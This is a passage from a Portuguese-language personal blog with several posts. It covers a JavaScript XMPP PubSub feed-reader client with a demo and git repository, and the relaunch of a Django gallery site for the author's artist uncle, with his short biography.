Atom) no
PubSub, tudo em
JavaScript. Que no fundo é um cliente que agrega feeds XML a cada contato. Meu primeiro orientador achou que eu estava pirando muito e podou um tantão o que eu iria implementar. Em apenas dois dias eu fiz o cliente, usando como base um exemplo da jsjac. Fiz uma extensão da
jsjac que chamei de
pubsub.js e outra para recuperar as fotos dos usuários chamada
vcard.js. Usei a
jQuery pra fazer algumas coisas no cliente, mas como não pude pirar muito naquela época, tá tudo bem simples. Espero voltar a mexer nesse projeto logo.
Rodei um demo aqui:
http://metalstream.alucinados.com/
E quem quiser mandar
patch, eu uso
git, é só rodar um:
git clone http://git.alucinados.com/git/metalstream.git
Alguns screenshots dele funcionando:
Login:
|
Cadastrando um Feed:
|
Lendo um Feed:
|
1) Teste de Memória do Windows:
|
2) CD de recuperação da HP com Windows:
|
3) Instalação do MacOSX:
|
Alguns minutos antes de ir pro
FISL 10, eu lancei a segunda versão do
site lujorge.com.br. Esse site, eu fiz pra ajudar a divulgar o trabalho que o meu Tio Luiz Henrique, mais conhecido como Tí Lú, faz... A primeira versão foi uma experiência feita na tarde do Dias da Mães, onde exibia todos os trabalhos como
thumbnails e uma foto grande. Não me preocupei com o tempo que levaria para carregar o
site e nem se os
thumbnails iriam ficar bonitos. Apenas joguei tudo lá pra mostrar pra minha família e pro meu Tio, e esse foi o resultado:
Já essa segunda versão, eu fiz usando:
Django,
jquery e o
galleriffic. E como não sou um
designer, ou melhor um
hippie, aproveitei que o
lincoln fez um menu legal pro
EMSL 2009 e licenciou como
GPL, pra usar no site. Esse é o resultado dessa segunda versão:
Agora é divulgar o trabalho pra tudo que é canto!
Sobre o meu Tio:
"
Sou natural de Belo Horizonte/MG, onde resido atualmente. Tenho 35 anos, desenho desde os 5 anos de idade e me formei na Escola de Belas Artes da UFMG em 2000, me especializando em escultura e pintura. Hoje em dia faço trabalhos de decoração em festas e tenho produzido trabalhos para possíveis exposições."
